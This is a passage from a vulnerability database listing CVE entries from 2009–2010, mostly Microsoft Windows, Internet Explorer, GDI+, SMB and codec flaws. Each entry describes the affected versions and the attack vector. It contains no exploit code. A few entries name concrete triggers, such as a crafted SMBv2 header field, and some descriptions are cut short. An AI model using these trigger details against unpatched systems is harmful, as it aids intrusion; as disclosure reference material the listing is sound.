Microsoft Producer 2003, allows remote attackers to execute arbitrary code via a crafted project (.MSWMM) file, aka "Movie Maker and Producer Buffer Overflow Vulnerability." [CVE-2010-0252] The Microsoft Data Analyzer ActiveX control (aka the Office Excel ActiveX control for Data Analysis) in max3activex.dll in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to execute arbitrary code via a crafted web page that corrupts the "system state," aka "Microsoft Data Analyzer ActiveX Control Vulnerability." [CVE-2010-0250] Heap-based buffer overflow in DirectShow in Microsoft DirectX, as used in the AVI Filter on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2, and in Quartz on Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, allows remote attackers to execute arbitrary code via an AVI file with a crafted length field in an unspecified video stream, which is not properly handled by the RLE video decompressor, aka "DirectShow Heap Overflow Vulnerability." [CVE-2010-0249] Use-after-free vulnerability in Microsoft Internet Explorer 6, 6 SP1, 7, and 8 on Windows 2000 SP4 [CVE-2010-0242] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows remote attackers to cause a denial of service (system hang) via crafted packets with malformed TCP selective acknowledgement (SACK) values, aka "TCP/IP Selective Acknowledgement Vulnerability." [CVE-2010-0241] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when IPv6 is enabled, does not properly perform bounds checking on ICMPv6 Route Information packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "ICMPv6 Route Information Vulnerability." [CVE-2010-0240] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when a custom network driver is used, does not properly handle local fragmentation of Encapsulating Security Payload (ESP) over UDP packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "Header MDL Fragmentation Vulnerability." [CVE-2010-0239] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when IPv6 is enabled, does not properly perform bounds checking on ICMPv6 Router Advertisement packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "ICMPv6 Router Advertisement Vulnerability." [CVE-2010-0238] Unspecified vulnerability in registry-key validation in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Registry Key Vulnerability." [CVE-2010-0237] The kernel in Microsoft Windows 2000 SP4 and XP SP2 and SP3 allows local users to gain privileges by creating a symbolic link from an untrusted registry hive to a trusted registry hive, aka "Windows Kernel Symbolic Link Creation Vulnerability." [CVE-2010-0236] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold does not properly allocate memory for the destination key associated with a symbolic-link registry key, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Memory Allocation Vulnerability." [CVE-2010-0235] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold does not perform the expected validation before creating a symbolic link, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Symbolic Link Value Vulnerability." [CVE-2010-0234] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not properly validate a registry-key argument to an unspecified system call, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Null Pointer Vulnerability." [CVE-2010-0233] Double free vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows local users to gain privileges via a crafted application, aka "Windows Kernel Double Free Vulnerability." [CVE-2010-0232] The kernel in Microsoft Windows NT 3.1 through Windows 7, including Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges by crafting a VDM_TIB data structure in the Thread Environment Block (TEB), and then calling the NtVdmControl function to start the Windows Virtual DOS Machine (aka NTVDM) subsystem, leading to improperly handled exceptions involving the #GP trap handler (nt!KiTrap0D), aka "Windows Kernel Exception Handler Vulnerability." [CVE-2010-0231] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not use a sufficient source of entropy, which allows remote attackers to obtain access to files and other SMB resources via a large number of authentication requests, related to server-generated challenges, certain "duplicate values," and spoofing of an authentication token, aka "SMB NTLM Authentication Lack of Entropy Vulnerability." [CVE-2010-0035] The Key Distribution Center (KDC) in Kerberos in Microsoft Windows 2000 SP4, Server 2003 SP2, and Server 2008 Gold and SP2, when a trust relationship with a non-Windows Kerberos realm exists, allows remote authenticated users to cause a denial of service (NULL pointer dereference and domain controller outage) via a crafted Ticket Granting Ticket (TGT) renewal request, aka "Kerberos Null Pointer Dereference Vulnerability." [CVE-2010-0028] Integer overflow in Microsoft Paint in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted JPEG (.JPG) file, aka "MS Paint Integer Overflow Vulnerability." [CVE-2010-0027] The URL validation functionality in Microsoft Internet Explorer 5.01, 6, 6 SP1, 7 and 8, and the ShellExecute API function in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, does not properly process input parameters, which allows remote attackers to execute arbitrary local programs via a crafted URL, aka "URL Validation Vulnerability." [CVE-2010-0026] The Hyper-V server implementation in Microsoft Windows Server 2008 Gold, SP2, and R2 on the x64 platform allows guest OS users to cause a denial of service (host OS hang) via a crafted application that executes a malformed series of machine instructions, aka "Hyper-V Instruction Set Validation Vulnerability." [CVE-2010-0025] The SMTP component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Server 2008 Gold, SP2, and R2, and Exchange Server 2000 SP3, does not properly allocate memory for SMTP command replies, which allows remote attackers to read fragments of e-mail messages by sending a series of invalid commands and then sending a STARTTLS command, aka "SMTP Memory Allocation Vulnerability." [CVE-2010-0024] The SMTP component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Server 2008 Gold, SP2, and R2, and Exchange Server 2003 SP2, does not properly parse MX records, which allows remote DNS servers to cause a denial of service (service outage) via a crafted response to a DNS MX record query, aka "SMTP Server MX Record Vulnerability." [CVE-2010-0023] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly kill processes after a logout, which allows local users to obtain sensitive information or gain privileges via a crafted application that continues to execute throughout the logout of one user and the login session of the next user, aka "CSRSS Local Privilege Elevation Vulnerability." [CVE-2010-0022] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate the share and servername fields in SMB packets, which allows remote attackers to cause a denial of service (system hang) via a crafted packet, aka "SMB Null Pointer Vulnerability." [CVE-2010-0021] Multiple race conditions in the SMB implementation in the Server service in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allow remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 Negotiate packet, aka "SMB Memory Corruption Vulnerability." [CVE-2010-0020] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate request fields, which allows remote authenticated users to execute arbitrary code via a malformed request, aka "SMB Pathname Overflow Vulnerability." [CVE-2010-0019] Microsoft Silverlight 3 before 3.0.50611.0 on Windows, and before 3.0.41130.0 on Mac OS X, does not properly handle pointers, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and framework outage) via a crafted web site, aka "Microsoft Silverlight Memory Corruption Vulnerability." [CVE-2010-0018] Integer overflow in the Embedded OpenType (EOT) Font Engine (t2embed.dll) in Microsoft Windows 2000 SP4 [CVE-2010-0017] Race condition in the SMB client implementation in Microsoft Windows Server 2008 R2 and Windows 7 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code, and in the SMB client implementation in Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows local users to gain privileges, via a crafted SMB Negotiate response, aka "SMB Client Race Condition Vulnerability." [CVE-2010-0016] The SMB client implementation in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly validate response fields, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted response, aka "SMB Client Pool Corruption Vulnerability." [CVE-2009-4313] ir32_32.dll 3.24.15.3 in the Indeo32 codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to cause a denial of service (heap corruption) or execute arbitrary code via malformed data in a stream in a media file, as demonstrated by an AVI file. [CVE-2009-4312] Unspecified vulnerability in the Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted media content, as reported to Microsoft by Dave Lenoe of Adobe. [CVE-2009-4311] Unspecified vulnerability in the Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted media content, as reported to Microsoft by Paul Byrne of NGS Software. NOTE: this might overlap CVE-2008-3615. [CVE-2009-4310] Stack-based buffer overflow in the Intel Indeo41 codec for Windows Media Player in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted compressed video data in an IV41 stream in a media file, leading to many loop iterations, as demonstrated by data in an AVI file. [CVE-2009-4309] Heap-based buffer overflow in the Intel Indeo41 codec for Windows Media Player in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via a large size value in a movi record in an IV41 stream in a media file, as demonstrated by an AVI file. [CVE-2009-4210] The Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted media content. [CVE-2009-3678] Integer overflow in cdd.dll in the Canonical Display Driver (CDD) in Microsoft Windows Server 2008 R2 and Windows 7 on 64-bit platforms, when the Windows Aero theme is installed, allows context-dependent attackers to cause a denial of service (reboot) or possibly execute arbitrary code via a crafted image file that triggers incorrect data parsing after user-mode data is copied to kernel mode, as demonstrated using "Browse with Irfanview" and certain actions on a folder containing a large number of thumbnail images in Resample mode, possibly related to the ATI graphics driver or win32k.sys, aka "Canonical Display Driver Integer Overflow Vulnerability." [CVE-2009-3677] The Internet Authentication Service (IAS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold and SP1, and Server 2008 Gold does not properly verify the credentials in an MS-CHAP v2 Protected Extensible Authentication Protocol (PEAP) authentication request, which allows remote attackers to access network resources via a malformed request, aka "MS-CHAP Authentication Bypass Vulnerability." [CVE-2009-3676] The SMB client in the kernel in Microsoft Windows Server 2008 R2 and Windows 7 allows remote SMB servers and man-in-the-middle attackers to cause a denial of service (infinite loop and system hang) via a (1) SMBv1 or (2) SMBv2 response packet that contains (a) an incorrect length value in a NetBIOS header or (b) an additional length field at the end of this response packet, aka "SMB Client Incomplete Response Vulnerability." [CVE-2009-3675] LSASS.exe in the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote authenticated users to cause a denial of service (CPU consumption) via a malformed ISAKMP request over IPsec, aka "Local Security Authority Subsystem Service Resource Exhaustion Vulnerability." [CVE-2009-3294] The popen API function in TSRM/tsrm_win32.c in PHP before 5.2.11 and 5.3.x before 5.3.1, when running on certain Windows operating systems, allows context-dependent attackers to cause a denial of service (crash) via a crafted (1) "e" or (2) "er" string in the second argument (aka mode), possibly related to the _fdopen function in the Microsoft C runtime library. NOTE: this might not cross privilege boundaries except in rare cases in which the mode argument is accessible to an attacker outside of an application that uses the popen function. [CVE-2009-3126] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Integer Overflow Vulnerability." [CVE-2009-3103] Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2009-3020] win32k.sys in Microsoft Windows Server 2003 SP2 allows remote attackers to cause a denial of service (system crash) by referencing a crafted .eot file in the src descriptor of an @font-face Cascading Style Sheets (CSS) rule in an HTML document, possibly related to the Embedded OpenType (EOT) Font Engine, a different vulnerability than CVE-2006-0010, CVE-2009-0231, and CVE-2009-0232. NOTE: some of these details are obtained from third party information. [CVE-2009-3019] Microsoft Internet Explorer 6 on Windows XP SP2 and SP3, and Internet Explorer 7 on Vista, allows remote attackers to cause a denial of service (application crash) via JavaScript code that calls createElement to create an instance of the LI element, and then calls setAttribute to set the value attribute. [CVE-2009-2764] Microsoft Internet Explorer 8.0.7100.0 on Windows 7 RC on the x64 platform allows remote attackers to cause a denial of service (application crash) via a certain DIV element in conjunction with SCRIPT elements that have empty contents and no reference to a valid external script location. [CVE-2009-2655] mshtml.dll in Microsoft Internet Explorer 7 and 8 on Windows XP SP3 allows remote attackers to cause a denial of service (application crash) by calling the JavaScript findText method with a crafted Unicode string in the first argument, and only one additional argument, as demonstrated by a second argument of -1. [CVE-2009-2653] DISPUTED The NtUserConsoleControl function in win32k.sys in Microsoft Windows XP SP2 and SP3, and Server 2003 before SP1, allows local administrators to bypass unspecified "security software" and gain privileges via a crafted call that triggers an overwrite of an arbitrary memory location. NOTE: the vendor disputes the significance of this report, stating that 'the Administrator to SYSTEM "escalation" is not a security boundary we defend.' [CVE-2009-2544] Directory traversal vulnerability in the Marcelo Costa FileServer component 1.0 for Microsoft Windows Live Messenger and Messenger Plus! Live (MPL) allows remote authenticated users to list arbitrary directories and read arbitrary files via a .. (dot dot) in a pathname. [CVE-2009-2532] Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC do not properly process the command value in an SMB Multi-Protocol Negotiate Request packet, which allows remote attackers to execute arbitrary code via a crafted SMBv2 packet to the Server service, aka "SMBv2 Command Value Vulnerability." [CVE-2009-2527] Heap-based buffer overflow in Microsoft Windows Media Player 6.4 allows remote attackers to execute arbitrary code via (1) a crafted ASF file or (2) crafted streaming content, aka "WMP Heap Overflow Vulnerability." [CVE-2009-2526] Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 do not properly validate fields in SMBv2 packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted packet to the Server service, aka "SMBv2 Infinite Loop Vulnerability." [CVE-2009-2525] Microsoft Windows Media Runtime, as used in DirectShow WMA Voice Codec, Windows Media Audio Voice Decoder, and Audio Compression Manager (ACM), does not properly initialize unspecified functions within compressed audio files, which allows remote attackers to execute arbitrary code via (1) a crafted media file or (2) crafted streaming content, aka "Windows Media Runtime Heap Corruption Vulnerability." [CVE-2009-2524] Integer underflow in the NTLM authentication feature in the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to cause a denial of service (reboot) via a malformed packet, aka "Local Security Authority Subsystem Service Integer Overflow Vulnerability." [CVE-2009-2523] The License Logging Server (llssrv.exe) in Microsoft Windows 2000 SP4 allows remote attackers to execute arbitrary code via an RPC message containing a string without a null terminator, which triggers a heap-based buffer overflow in the LlsrLicenseRequestW method, aka "License Logging Server Heap Overflow Vulnerability." [CVE-2009-2519] The DHTML Editing Component ActiveX control in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly format HTML markup, which allows remote attackers to execute arbitrary code via a crafted web site that triggers "system state" corruption, aka "DHTML Editing Component ActiveX Control Vulnerability." [CVE-2009-2517] The kernel in Microsoft Windows Server 2003 SP2 does not properly handle unspecified exceptions when an error condition occurs, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2009-2516] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold and SP1, and Server 2008 Gold does not properly validate data sent from user mode, which allows local users to gain privileges via a crafted PE .exe file that triggers a NULL pointer dereference during chain traversal, aka "Windows Kernel NULL Pointer Dereference Vulnerability." [CVE-2009-2515] Integer underflow in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows local users to gain privileges via a crafted application that triggers an incorrect truncation of a 64-bit integer to a 32-bit integer, aka "Windows Kernel Integer Underflow Vulnerability." [CVE-2009-2514] win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not correctly parse font code during construction of a directory-entry table, which allows remote attackers to execute arbitrary code via a crafted Embedded OpenType (EOT) font, aka "Win32k EOT Parsing Vulnerability." [CVE-2009-2513] The Graphics Device Interface (GDI) in win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Insufficient Data Validation Vulnerability." [CVE-2009-2511] Integer overflow in the CryptoAPI component in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows man-in-the-middle attackers to spoof arbitrary SSL servers and other entities via an X.509 certificate that has a malformed ASN.1 Object Identifier (OID) and was issued by a legitimate Certification Authority, aka "Integer Overflow in X.509 Object Identifiers Vulnerability." [CVE-2009-2510] The CryptoAPI component in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, as used by Internet Explorer and other applications, does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, aka "Null Truncation in X.509 Common Name Vulnerability," a related issue to CVE-2009-2408. [CVE-2009-2509] Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly validate headers in HTTP requests, which allows remote authenticated users to execute arbitrary code via a crafted request to an IIS web server, aka "Remote Code Execution in ADFS Vulnerability." [CVE-2009-2508] The single sign-on implementation in Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly remove credentials at the end of a network session, which allows physically proximate attackers to obtain the credentials of a previous user of the same web browser by using data from the browser's cache, aka "Single Sign On Spoofing in ADFS Vulnerability." [CVE-2009-2507] A certain ActiveX control in the Indexing Service in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly process URLs, which allows remote attackers to execute arbitrary programs via unspecified vectors that cause a "vulnerable binary" to load and run, aka "Memory Corruption in Indexing Service Vulnerability." [CVE-2009-2505] The Internet Authentication Service (IAS) in Microsoft Windows Vista SP2 and Server 2008 SP2 does not properly validate MS-CHAP v2 Protected Extensible Authentication Protocol (PEAP) authentication requests, which allows remote attackers to execute arbitrary code via crafted structures in a malformed request, aka "Internet Authentication Service Memory Corruption Vulnerability." [CVE-2009-2504] Multiple integer overflows in unspecified APIs in GDI+ in Microsoft .NET Framework 1.1 SP1, .NET Framework 2.0 SP1 and SP2, Windows XP SP2 and SP3, Windows Server 2003 SP2, Vista Gold and SP1, Server 2008 Gold, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allow remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "GDI+ .NET API Vulnerability." [CVE-2009-2503] GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Windows Server 2003 SP2, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 does not properly allocate an unspecified buffer, which allows remote attackers to execute arbitrary code via a crafted TIFF image file that triggers memory corruption, aka "GDI+ TIFF Memory Corruption Vulnerability." [CVE-2009-2502] Buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted TIFF image file, aka "GDI+ TIFF Buffer Overflow Vulnerability." [CVE-2009-2501] Heap-based buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Heap Overflow Vulnerability." [CVE-2009-2500] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted WMF image file, aka "GDI+ WMF Integer Overflow Vulnerability." [CVE-2009-2499] Microsoft Windows Media Format Runtime 9.0, 9.5, and 11 [CVE-2009-2498] Microsoft Windows Media Format Runtime 9.0, 9.5, and 11 and Windows Media Services 9.1 and 2008 do not properly parse malformed headers in Advanced Systems Format (ASF) files, which allows remote attackers to execute arbitrary code via a crafted (1) .asf, (2) .wmv, or (3) .wma file, aka "Windows Media Header Parsing Invalid Free Vulnerability." [CVE-2009-2494] The Active Template Library (ATL) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via vectors related to erroneous free operations after reading a variant from a stream and deleting this variant, aka "ATL Object Type Mismatch Vulnerability." [CVE-2009-2484] Stack-based buffer overflow in the Win32AddConnection function in modules/access/smb.c in VideoLAN VLC media player 0.9.9, when running on Microsoft Windows, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long smb URI in a playlist file. [CVE-2009-2357] The default configuration of TekRADIUS 3.0 uses the sa account to communicate with Microsoft SQL Server, which makes it easier for remote attackers to obtain privileged access to the database and the underlying Windows operating system. [CVE-2009-1930] The Telnet service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote Telnet servers to execute arbitrary code on a client machine by replaying the NTLM credentials of a client user, aka "Telnet Credential Reflection Vulnerability," a related issue to CVE-2000-0834. [CVE-2009-1929] Heap-based buffer overflow in the Microsoft Terminal Services Client ActiveX control running RDP 6.1 on Windows XP SP2, Vista SP1 or SP2, or Server 2008 Gold or SP2 [CVE-2009-1928] Stack consumption vulnerability in the LDAP service in Active Directory on Microsoft Windows 2000 SP4, Server 2003 SP2, and Server 2008 Gold and SP2 [CVE-2009-1926] Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to cause a denial of service (TCP outage) via a series of TCP sessions that have pending data and a (1) small or (2) zero receive window size, and remain in the FIN-WAIT-1 or FIN-WAIT-2 state indefinitely, aka "TCP/IP Orphaned Connections Vulnerability." [CVE-2009-1925] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 does not properly manage state information, which allows remote attackers to execute arbitrary code by sending packets to a listening service, and thereby triggering misinterpretation of an unspecified field as a function pointer, aka "TCP/IP Timestamps Code Execution Vulnerability." [CVE-2009-1924] Integer overflow in the Windows Internet Name Service (WINS) component for Microsoft Windows 2000 SP4 allows remote WINS replication partners to execute arbitrary code via crafted data structures in a packet, aka "WINS Integer Overflow Vulnerability." [CVE-2009-1923] Heap-based buffer overflow in the Windows Internet Name Service (WINS) component for Microsoft Windows 2000 SP4 and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted WINS replication packet that triggers an incorrect buffer-length calculation, aka "WINS Heap Overflow Vulnerability." [CVE-2009-1922] The Message Queuing (aka MSMQ) service for Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP2, and Vista Gold does not properly validate unspecified IOCTL request data from user mode before passing this data to kernel mode, which allows local users to gain privileges via a crafted request, aka "MSMQ Null Pointer Vulnerability." [CVE-2009-1920] The JScript scripting engine 5.1, 5.6, 5.7, and 5.8 in JScript.dll in Microsoft Windows, as used in Internet Explorer, does not properly load decoded scripts into memory before execution, which allows remote attackers to execute arbitrary code via a crafted web site that triggers memory corruption, aka "JScript Remote Code Execution Vulnerability." [CVE-2009-1808] Microsoft Windows XP SP3 allows local users to cause a denial of service (system crash) by making an SPI_SETDESKWALLPAPER SystemParametersInfo call with an improperly terminated pvParam argument, followed by an SPI_GETDESKWALLPAPER SystemParametersInfo call. [CVE-2009-1546] Integer overflow in Avifil32.dll in the Windows Media file handling functionality in Microsoft Windows allows remote attackers to execute arbitrary code on a Windows 2000 SP4 system via a crafted AVI file, or cause a denial of service on a Windows XP SP2 or SP3, Server 2003 SP2, Vista Gold, SP1, or SP2, or Server 2008 Gold or SP2 system via a crafted AVI file, aka "AVI Integer Overflow Vulnerability." [CVE-2009-1545] Unspecified vulnerability in Avifil32.dll in the Windows Media file handling functionality in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a malformed header in a crafted AVI file, aka "Malformed AVI Header Vulnerability." 